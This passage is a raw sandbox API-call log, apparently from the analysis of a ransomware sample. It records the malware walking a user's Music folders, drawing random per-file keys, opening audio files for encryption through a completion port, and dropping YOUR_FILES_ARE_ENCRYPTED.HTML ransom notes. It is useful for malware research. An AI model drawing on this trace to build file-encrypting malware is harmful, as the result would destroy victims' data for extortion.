RandomBuffer=0x19e480) returned 1 [0124.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\N1HKAQQ4Fz9a.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\r5r-my iy_mo5vx\\o2hyotnpdqaklcag\\n1hkaqq4fz9a.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0124.674] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=2471) returned 1 [0124.674] GetProcessHeap () returned 0x600000 [0124.674] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.677] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="3B") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="EC") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="1A") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="07") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="55") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="1A") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="AE") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="D8") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="86") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="7A") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="BA") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="CA") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="D6") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="2F") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="84") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="83") returned 2 [0124.677] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="F8") returned 2 [0124.677] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="8B") returned 2 [0124.677] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="A8") returned 2 [0124.677] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="26") returned 2 [0124.677] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="D1") returned 2 [0124.677] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="A9") returned 2 [0124.677] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="3E") returned 2 [0124.678] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="08") returned 2 [0124.678] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="EC") returned 2 [0124.678] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="48") returned 2 [0124.678] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="FE") returned 2 [0124.678] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="DE") returned 2 [0124.678] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="F7") returned 2 [0124.678] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="3F") returned 2 [0124.678] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="B7") returned 2 [0124.678] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="1F") returned 2 [0124.678] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\N1HKAQQ4Fz9a.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\N1HKAQQ4Fz9a.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\N1HKAQQ4Fz9a.m4a" [0124.678] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.678] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.681] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd48b7ff0, ftCreationTime.dwHighDateTime=0x1d6fd63, ftLastAccessTime.dwLowDateTime=0x33f0c9d0, ftLastAccessTime.dwHighDateTime=0x1d70752, ftLastWriteTime.dwLowDateTime=0x33f0c9d0, ftLastWriteTime.dwHighDateTime=0x1d70752, nFileSizeHigh=0x0, nFileSizeLow=0x15a89, dwReserved0=0x19e638, dwReserved1=0x38fb0e3, cFileName="PLmD7j9ir_qeg.wav", cAlternateFileName="PLMD7J~1.WAV")) returned 1 [0124.681] StrStrIW (lpFirst="PLmD7j9ir_qeg.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.681] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PLmD7j9ir_qeg.wav") returned 102 [0124.681] PathFindExtensionW (pszPath="PLmD7j9ir_qeg.wav") returned=".wav" [0124.681] lstrlenW (lpString=".wav") returned 4 [0124.682] PathFindExtensionW (pszPath="PLmD7j9ir_qeg.wav") returned=".wav" [0124.682] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0124.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PLmD7j9ir_qeg.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\r5r-my iy_mo5vx\\o2hyotnpdqaklcag\\plmd7j9ir_qeg.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0124.682] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=88713) returned 1 [0124.682] GetProcessHeap () returned 0x600000 [0124.682] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.683] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="F7") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="C3") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="98") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="BA") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="13") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="7E") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="86") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="39") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="98") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="27") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="A9") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="FC") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="E2") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="A9") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="E9") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="55") returned 2 [0124.683] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="FD") returned 2 [0124.683] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="7D") returned 2 [0124.683] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="D9") returned 2 [0124.683] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="A4") returned 2 [0124.683] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="00") returned 2 [0124.683] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="29") returned 2 [0124.683] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="26") returned 2 [0124.683] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="77") returned 2 [0124.683] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="28") returned 2 [0124.683] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="86") returned 2 [0124.683] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="B6") returned 2 [0124.683] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="40") returned 2 [0124.683] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="08") returned 2 [0124.684] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="7E") returned 2 [0124.684] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="B0") returned 2 [0124.684] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="47") returned 2 [0124.684] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PLmD7j9ir_qeg.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PLmD7j9ir_qeg.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PLmD7j9ir_qeg.wav" [0124.684] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.684] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.687] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb55e7030, ftCreationTime.dwHighDateTime=0x1d707b1, ftLastAccessTime.dwLowDateTime=0x6a793e40, ftLastAccessTime.dwHighDateTime=0x1d708c1, ftLastWriteTime.dwLowDateTime=0x6a793e40, ftLastWriteTime.dwHighDateTime=0x1d708c1, nFileSizeHigh=0x0, nFileSizeLow=0x1135a, dwReserved0=0x19e638, dwReserved1=0x38fb0e3, cFileName="PXLHKJzLSE2UqSQL.wav", cAlternateFileName="PXLHKJ~1.WAV")) returned 1 [0124.687] StrStrIW (lpFirst="PXLHKJzLSE2UqSQL.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.687] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PXLHKJzLSE2UqSQL.wav") returned 105 [0124.687] PathFindExtensionW (pszPath="PXLHKJzLSE2UqSQL.wav") returned=".wav" [0124.687] lstrlenW (lpString=".wav") returned 4 [0124.687] PathFindExtensionW (pszPath="PXLHKJzLSE2UqSQL.wav") returned=".wav" [0124.687] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0124.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PXLHKJzLSE2UqSQL.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\r5r-my iy_mo5vx\\o2hyotnpdqaklcag\\pxlhkjzlse2uqsql.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0124.688] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=70490) returned 1 [0124.688] GetProcessHeap () returned 0x600000 [0124.688] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.688] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="14") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="F7") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="61") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="75") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="8A") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="8B") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="03") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="63") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="DE") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="B8") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="65") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="B7") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="DE") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="A5") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="C0") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="34") returned 2 [0124.689] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="87") returned 2 [0124.689] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="E4") returned 2 [0124.689] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="4E") returned 2 [0124.689] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="8B") returned 2 [0124.689] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="96") returned 2 [0124.689] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="8C") returned 2 [0124.689] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="AB") returned 2 [0124.689] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="FA") returned 2 [0124.689] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="28") returned 2 [0124.689] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="8D") returned 2 [0124.689] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="41") returned 2 [0124.689] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="6F") returned 2 [0124.689] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="40") returned 2 [0124.689] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="9A") returned 2 [0124.689] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="8E") returned 2 [0124.689] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="37") returned 2 [0124.690] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PXLHKJzLSE2UqSQL.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PXLHKJzLSE2UqSQL.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\PXLHKJzLSE2UqSQL.wav" [0124.690] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.690] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.693] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb55e7030, ftCreationTime.dwHighDateTime=0x1d707b1, ftLastAccessTime.dwLowDateTime=0x6a793e40, ftLastAccessTime.dwHighDateTime=0x1d708c1, ftLastWriteTime.dwLowDateTime=0x6a793e40, ftLastWriteTime.dwHighDateTime=0x1d708c1, nFileSizeHigh=0x0, nFileSizeLow=0x1135a, dwReserved0=0x19e638, dwReserved1=0x38fb0e3, cFileName="PXLHKJzLSE2UqSQL.wav", cAlternateFileName="PXLHKJ~1.WAV")) returned 0 [0124.693] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0124.693] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0124.693] GetProcessHeap () returned 0x600000 [0124.693] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\r5r-my iy_mo5vx\\o2hyotnpdqaklcag\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0124.694] WriteFile (in: hFile=0x334, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0124.695] CloseHandle (hObject=0x334) returned 1 [0124.695] GetProcessHeap () returned 0x600000 [0124.695] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.695] GetProcessHeap () returned 0x600000 [0124.695] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0124.695] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x108f74f0, ftCreationTime.dwHighDateTime=0x1d702a7, ftLastAccessTime.dwLowDateTime=0xc2fd6a50, ftLastAccessTime.dwHighDateTime=0x1d7065a, ftLastWriteTime.dwLowDateTime=0xc2fd6a50, ftLastWriteTime.dwHighDateTime=0x1d7065a, nFileSizeHigh=0x0, nFileSizeLow=0x109b3, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="v6Rl-DRR36udQvyJ9.mp3", cAlternateFileName="V6RL-D~1.MP3")) returned 1 [0124.695] StrStrIW (lpFirst="v6Rl-DRR36udQvyJ9.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.695] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\v6Rl-DRR36udQvyJ9.mp3") returned 89 [0124.695] PathFindExtensionW (pszPath="v6Rl-DRR36udQvyJ9.mp3") returned=".mp3" [0124.696] lstrlenW (lpString=".mp3") returned 4 [0124.696] PathFindExtensionW (pszPath="v6Rl-DRR36udQvyJ9.mp3") returned=".mp3" [0124.696] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0124.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\v6Rl-DRR36udQvyJ9.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\r5r-my iy_mo5vx\\v6rl-drr36udqvyj9.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.696] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=68019) returned 1 [0124.696] GetProcessHeap () returned 0x600000 [0124.696] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.697] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="78") returned 2 [0124.697] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="6A") returned 2 [0124.697] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="57") returned 2 [0124.697] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="56") returned 2 [0124.697] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="F6") returned 2 [0124.697] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="63") returned 2 [0124.697] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="F0") returned 2 [0124.697] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="E4") returned 2 [0124.697] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="5E") returned 2 [0124.697] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="D3") returned 2 [0124.697] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="71") returned 2 [0124.697] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="E2") returned 2 [0124.697] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="20") returned 2 [0124.697] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="0E") returned 2 [0124.697] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="FD") returned 2 [0124.697] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="56") returned 2 [0124.697] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="CD") returned 2 [0124.697] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="E8") returned 2 [0124.697] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="FA") returned 2 [0124.697] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="69") returned 2 [0124.697] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="24") returned 2 [0124.697] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="BD") returned 2 [0124.697] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="7F") returned 2 [0124.697] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="70") returned 2 [0124.697] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="8F") returned 2 [0124.697] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="2C") returned 2 [0124.697] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="6F") returned 2 [0124.697] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="C6") returned 2 [0124.697] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="46") returned 2 [0124.698] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="8B") returned 2 [0124.698] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="08") returned 2 [0124.698] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="69") returned 2 [0124.698] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\v6Rl-DRR36udQvyJ9.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\v6Rl-DRR36udQvyJ9.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\v6Rl-DRR36udQvyJ9.mp3" [0124.698] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.698] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.701] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x108f74f0, ftCreationTime.dwHighDateTime=0x1d702a7, ftLastAccessTime.dwLowDateTime=0xc2fd6a50, ftLastAccessTime.dwHighDateTime=0x1d7065a, ftLastWriteTime.dwLowDateTime=0xc2fd6a50, ftLastWriteTime.dwHighDateTime=0x1d7065a, nFileSizeHigh=0x0, nFileSizeLow=0x109b3, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="v6Rl-DRR36udQvyJ9.mp3", cAlternateFileName="V6RL-D~1.MP3")) returned 0 [0124.702] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0124.702] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0124.702] GetProcessHeap () returned 0x600000 [0124.702] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\r5r-my iy_mo5vx\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0124.703] WriteFile (in: hFile=0x32c, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0124.703] CloseHandle (hObject=0x32c) returned 1 [0124.704] GetProcessHeap () returned 0x600000 [0124.704] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.704] 